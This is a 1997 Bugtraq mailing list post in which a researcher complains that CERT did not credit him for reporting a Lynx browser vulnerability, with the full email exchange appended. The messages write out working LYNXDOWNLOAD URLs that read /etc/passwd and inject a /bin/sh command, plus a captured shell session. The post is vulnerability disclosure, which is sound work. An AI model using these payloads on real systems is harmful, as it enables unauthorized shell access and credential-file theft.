Bugtraq mailing list archives
CERT does it again.
From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 22 Jul 1997 09:43:00 -0400
This is a post about CERT, and about how i didnt get credit for telling them
about a hole i found. ive got pretty much every letter from me to them..
Here's basically what happened (as i see it)
1) i told cert about it, they tried some crazy nonsensical things to get it
to work that the average unix user would know dont work.
2) they got the hole to work locally but they didnt appear to realize it was a
hole (and i thought security profs would)
3) they posted it to the lynx-dev list, which is open (i think), and by
doing that they released the hole to the public. (i thought that
cert was supposed to keep holes under wraps until they get them fixed)
4) they posted a VB that had a 'workaround' that didnt actually solve the
problem. (even if you cant 'g' to a URL you can still hit '?' or 'v'
depending on the version and if bookmarks are on and usually get to
yahoo. you can enter url tags at a yahoo seach prompt and force
a LYNXDOWNLOAD..) plus, i said that in the end of my first letter to
them.
Im really let down by CERT. From now on im posting straight to bugtraq.
To CERT: i told you about this hole. Without me, you wouldnt have known,
and the least you could do is get me the credit i deserved.
-------------------------------------------------------------------------------
From dynamo () ime net Thu Jul 17 22:52:48 1997
Date: Fri, 13 Jun 1997 13:57:01 -0400 (EDT) From: dynamo () ime net To: cert () cert org Cc: brent () ime net Subject: Hello, I believe youll find this interesting. I spoke to one of your people on the phone today, and she said pretty much that if you provide info that you guys dont already have, that you would give credit to the person who told you inside the advisory. with that in mind, i would like to tell you about something ive noticed. it related to universities and WAIS systems that use lynx in order to display pages. if you feed lynx a url like: LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin on many systems it will show you their file, on a surprisingly large number of systems there is now shadow. sometimes you cant use /dev/stdin and you need your tty or some other place. now, because this calls system() (i think.. i didnt check the source) LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin also works and gives you a shell prompt. i believe that this is a real problem for many universities out there. Now, if someone cannot (g) to a random URL, they can usually manuever to yahoo... and from there get a link redirector to go to these sites in <a href="">a</a> format. Note: this pretty much makes disallowing lynxexec: and file: as well as (g) useless. Thanks, dynamo -------------------------------------------------------------------------------
From cert () cert org Thu Jul 17 22:50:34 1997
Date: Tue, 17 Jun 97 10:22:04 EDT From: "CERT(R) Coordination Center" <cert () cert org> To: dynamo () ime net Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org> Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354) -----BEGIN PGP SIGNED MESSAGE----- Hi Dynamo, <dynamo () ime net> writes:
pages. if you feed lynx a url like: LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin on many systems it will show you their file, on a surprisingly large number of systems there is now shadow. sometimes you cant use /dev/stdin and you need your tty or some other place. now, because this calls system() (i think.. i didnt check the source) LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin also works and gives you a shell prompt. i believe that this is a real problem for many universities out there. Now, if someone cannot (g) to a random URL, they can usually manuever to yahoo... and from there get a link redirector to go to these sites in <a href="">a</a> format. Note: this pretty much makes disallowing lynxexec: and file: as well as (g) useless.
We tried both the of exploits that you discuss here, and we must be missing
something as we couldn't get either of them to work.
In the first case, what we did was attempt to attack the machine
"www.victim.example.com" from the machine "attacker.example.org" (note the
different domains - these are machine on separate networks).
attacker.example.org % lynx http://www.victim.example.com
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
The file "/usr/users/attacker/tmp/foo" contains the password file from
attacker.example.org, not the password file from www.victim.example.com.
The next test we tried was to attack the local machine, to see if we could
read the /etc/shadow file:
attacker.example.org % lynx /etc/shadow
Alert!: Unable to access document.
lynx: Can't access start file file://localhost/{...}/etc/shadow
which would be expected since /etc/shadow is not world readable, and lynx
is not a setuid program.
attacker.example.org % lynx http://www.attacker.example.org
{ and within lynx ... }
g
LYNXDOWNLOAD://Method=-1/File=/etc/shadow/SugFile=/dev/stdin
Enter a filename: /usr/users/attacker/tmp/foo
-- press space for next page --/shadow: Permission denied
Finally, we tried the second exploit you gave above, and the terminal
froze with the following errors:
Saving.....cp: Insufficient arguments (0)
Arrow keys: Up and Down to move. Right Usage: cp [-f] [-i] [-p] f1 f2ack.
H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history cp [-f] [-i] [-p] f1 ... fn d1
cp -r|R [-f] [-i] [-p] d1 ... dn-1 dn
(\!) \h \$
An attempt to use the second exploit with this modified operation:
LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh
also failed to produce a shell.
Is there some other part of the exploit that we have misunderstood? Thanks
for your report -- we look forward to any further pointers you may have.
Regards,
Rob.
| Rob McMillan Email: cert () cert org
|| CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute Fax: +1 (412) 268 6989
|||| Carnegie Mellon University Web: http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST)
* CERT is registered with the U.S. Patent and Trademark Office. The Software
Engineering Institute is sponsored by the U.S. Department of Defense.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBM6anMHVP+x0t4w7BAQHTPQP9FMuNoaLRiwWEU/fTDyuOn6zOnjFZlFXc
x5yvnGSojfWuQBCmGn3HTVDk+Kf7h2T8igdWUPtim9UGOW6uyMk/z4z1W/m+mHQ7
Rb2uTDdEyy7wJCVtdd1UkEaDwovt4m8Jx4BeDbA7feycaL0m3ypfWVPaAPVr0Nu0
BH7fLzp0Iw8=
=+nB7
-----END PGP SIGNATURE-----
-------------------------------------------------------------------------------
From dynamo () ime net Thu Jul 17 22:53:09 1997
Date: Wed, 18 Jun 1997 21:38:54 -0400 (EDT) From: dynamo () ime net To: "CERT(R) Coordination Center" <cert () cert org> Cc: brent () ime net Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354) Well, first ive gotten it to work, Im currently away from my house right now and dont have the machine name on me.. it was a [edited out] machine and i emailed the person who runs it alreday. i grabbed this from the email i had sent him.. ill give you a bigger list of affected boxes wheni get back. heres my screen capture: [7mSaving..... [K/bin/cp: missing file arguments Try `/bin/cp --help' for more information. bash$ bin dev lib proc tmp vmlinuz boot etc lost+found root usr zImage cdrom home mnt sbin var zImage.mem bash$ --------------- ill send you more info in a bit. this does work. first off the file you select as sugfile must be writable if you do put one in, second, all you ned to do is disable downloading and this problem is fixed. i wouldnt have emailed you if it didnt work. dynamo -------------------------------------------------------------------------------
From cert () cert org Thu Jul 17 22:50:47 1997
Date: Thu, 19 Jun 97 17:39:43 EDT From: "CERT(R) Coordination Center" <cert () cert org> To: dynamo () ime net Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org> Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354) -----BEGIN PGP SIGNED MESSAGE----- Hi, First, thanks for the feedback. <dynamo () ime net> writes:
Well, first ive gotten it to work, Im currently away from my house right now and dont have the machine name on me.. it was a [edited out] machine and i emailed the person who runs it alreday. i grabbed this from the email i had sent him.. ill give you a bigger list of affected boxes wheni get back. heres my screen capture: [7mSaving..... [K/bin/cp: missing file arguments Try `/bin/cp --help' for more information. bash$ bin dev lib proc tmp vmlinuz boot etc lost+found root usr zImage cdrom home mnt sbin var zImage.mem bash$ --------------- ill send you more info in a bit. this does work. first off the file you select as sugfile must be writable if you do put one in, second, all you ned to do is disable downloading and this problem is fixed. i wouldnt have emailed you if it didnt work.
Understood. We know that you wouldn't have sent us mail if you didn't have something that you think was worthwhile and needed addressing. Since we've been unable to replicate the problem that you are discussing, we want to make sure that we are understanding what you are doing, so that we can better understand the problem. We're glad that you took the time to advise us in the first place; our aim is to better understand what you are saying in case we are missing something. We tried the exploits again, and were able to get a shell on the local machine, but not on the remote machine. Can you send us a typescript (using the "script" command) where you replicate the problem, executing a "uname -a" on the local machine, and then when you get a shell on the remote machine, execute a "uname -a" in that shell? The typescript may show us something that you were doing that we have missed. Thanks again for any feedback. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU jdrXV6nDje8= =tayo -----END PGP SIGNATURE----- -------------------------------------------------------------------------------
From dynamo () ime net Thu Jul 17 22:53:31 1997
Date: Sat, 21 Jun 1997 23:01:03 -0400 (EDT) From: dynamo () ime net To: "CERT(R) Coordination Center" <cert () cert org> Cc: brent () ime net Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354) Okay, now what i attached is something that i sent in email to the admin of the box that it worked on.. as it worked by accident.. he didnt turn of downloading like i emailed him that he should... in that case maybe he didnt get it.. you may want to see if you can contact him.. ive tried plenty of times and im sick of getting my mail bounced back.. after about 10 tries one didnt.. ANYWAY its clearly a shell. note that i did not SEE my command line as i typed it in, but after hitting enter it did execute. I know it works on a few other Operating systems than lynx. but like i said.. the answer is just disallowing downloading. i believe there are more internal URLs in lynx that cause problems. i found this after doing a strings `which lynx`|less. so anyway, i hope you get the word out. for credit, "Aaron of Internet Maine (ime.net)" would be great. On Thu, 19 Jun 1997, CERT(R) Coordination Center wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hi, First, thanks for the feedback. <dynamo () ime net> writes:Well, first ive gotten it to work, Im currently away from my house right now and dont have the machine name on me.. it was a [edited out] machine and i emailed the person who runs it alreday. i grabbed this from the email i had sent him.. ill give you a bigger list of affected boxes wheni get back. heres my screen capture: [7mSaving..... [K/bin/cp: missing file arguments Try `/bin/cp --help' for more information. bash$ bin dev lib proc tmp vmlinuz boot etc lost+found root usr zImage cdrom home mnt sbin var zImage.mem bash$ --------------- ill send you more info in a bit. this does work. first off the file you select as sugfile must be writable if you do put one in, second, all you ned to do is disable downloading and this problem is fixed. i wouldnt have emailed you if it didnt work.Understood. We know that you wouldn't have sent us mail if you didn't have something that you think was worthwhile and needed addressing. Since we've been unable to replicate the problem that you are discussing, we want to make sure that we are understanding what you are doing, so that we can better understand the problem. We're glad that you took the time to advise us in the first place; our aim is to better understand what you are saying in case we are missing something. We tried the exploits again, and were able to get a shell on the local machine, but not on the remote machine. Can you send us a typescript (using the "script" command) where you replicate the problem, executing a "uname -a" on the local machine, and then when you get a shell on the remote machine, execute a "uname -a" in that shell? The typescript may show us something that you were doing that we have missed. Thanks again for any feedback. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU jdrXV6nDje8= =tayo -----END PGP SIGNATURE-----
[Part 2, "" Text/PLAIN 40 lines] [Unable to print this part] -------------------------------------------------------------------------------
From dynamo () ime net Thu Jul 17 22:53:53 1997
Date: Sun, 22 Jun 1997 02:08:20 -0400 (EDT) From: dynamo () ime net To: "CERT(R) Coordination Center" <cert () cert org> Cc: brent () ime net Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354) On the same bug i was talking about... Oh on another note.. what if someone did something like this: <HTML><TITLE>lame</TITLE><BODY> see my page </BODY></HTML> On Thu, 19 Jun 1997, CERT(R) Coordination Center wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hi, First, thanks for the feedback. <dynamo () ime net> writes:Well, first ive gotten it to work, Im currently away from my house right now and dont have the machine name on me.. it was a [edited out] machine and i emailed the person who runs it alreday. i grabbed this from the email i had sent him.. ill give you a bigger list of affected boxes wheni get back. heres my screen capture: [7mSaving..... [K/bin/cp: missing file arguments Try `/bin/cp --help' for more information. bash$ bin dev lib proc tmp vmlinuz boot etc lost+found root usr zImage cdrom home mnt sbin var zImage.mem bash$ --------------- ill send you more info in a bit. this does work. first off the file you select as sugfile must be writable if you do put one in, second, all you ned to do is disable downloading and this problem is fixed. i wouldnt have emailed you if it didnt work.Understood. We know that you wouldn't have sent us mail if you didn't have something that you think was worthwhile and needed addressing. Since we've been unable to replicate the problem that you are discussing, we want to make sure that we are understanding what you are doing, so that we can better understand the problem. We're glad that you took the time to advise us in the first place; our aim is to better understand what you are saying in case we are missing something. We tried the exploits again, and were able to get a shell on the local machine, but not on the remote machine. Can you send us a typescript (using the "script" command) where you replicate the problem, executing a "uname -a" on the local machine, and then when you get a shell on the remote machine, execute a "uname -a" in that shell? The typescript may show us something that you were doing that we have missed. Thanks again for any feedback. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU jdrXV6nDje8= =tayo -----END PGP SIGNATURE-----
-------------------------------------------------------------------------------
From cert () cert org Thu Jul 17 22:51:10 1997
Date: Mon, 23 Jun 97 17:09:35 EDT From: "CERT(R) Coordination Center" <cert () cert org> To: Aaron of Internet Maine <dynamo () ime net> Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org> Subject: lynx vulnerability (VU#5135) -----BEGIN PGP SIGNED MESSAGE----- Hi Aaron,
Okay, now what i attached is something that i sent in email to the admin of the box that it worked on.. as it worked by accident.. he didnt turn of downloading like i emailed him that he should... in that case maybe he didnt get it.. you may want to see if you can contact him.. ive tried plenty of times and im sick of getting my mail bounced back.. after about 10 tries one didnt.. ANYWAY its clearly a shell. note that i did not SEE my command line as i typed it in, but after hitting enter it did execute.
Okay, thanks for sending in the script. The script filled in the missing link - we didn't realise that the machine you were connecting to was running lynx under a captive service. We'll be getting in touch with the lynx folks. Thanks again for your report. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBM67nB3VP+x0t4w7BAQHlqwP+JouvUYGTllRwv7zCbhLMUOatzcgw8oVp rCKA/BlIroXALNWofjzhoJPiXjRCxY5cYCOvXUlvpFyvHduB3TYQiguDskjMCJY9 6rdStW6EmTyzw8aipCWOKegxZmV4lNhp/cv8ljeu1lUrqVwz+uFDTygdmccBXrKt bgZ2c6XnVm0= =hEXp -----END PGP SIGNATURE----- -------------------------------------------------------------------------------
From cert () cert org Thu Jul 17 22:51:27 1997
Date: Wed, 16 Jul 97 16:12:03 EDT From: "CERT(R) Coordination Center" <cert () cert org> To: dynamo () ime net Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org> Subject: Re: lynx vulnerability (VU#5135) Hi Aaron, <dynamo () ime net> writes:
I notice that you released a vendor initiated bulletin.. with no credit given to me. would you mind fixing that?
Thanks for drawing that to our attention. I'll pass that along to our writers. Thanks again for reporting the original problem to us. Regards, Rob. | Rob McMillan Email: cert () cert org || CERT Coordination Center (*) Phone: +1 (412) 268 7090 (24 x 7) ||| Software Engineering Institute Fax: +1 (412) 268 6989 |||| Carnegie Mellon University Web: http://www.cert.org ||||| Pittsburgh, Pa. 15213-3890 Timezone: GMT-5 (EST) * CERT is registered with the U.S. Patent and Trademark Office. The Software Engineering Institute is sponsored by the U.S. Department of Defense. -------------------------------------------------------------------------------
Current thread:
- CERT does it again. dynamo () IME NET (Jul 22)
- Re: CERT does it again. Alfred Huger (Jul 22)
- <Possible follow-ups>
- Re: CERT does it again. Lawrence R. Rogers (Jul 22)
- Re: CERT does it again. dynamo () IME NET (Jul 22)
- Re: CERT does it again. Alfred Huger (Jul 22)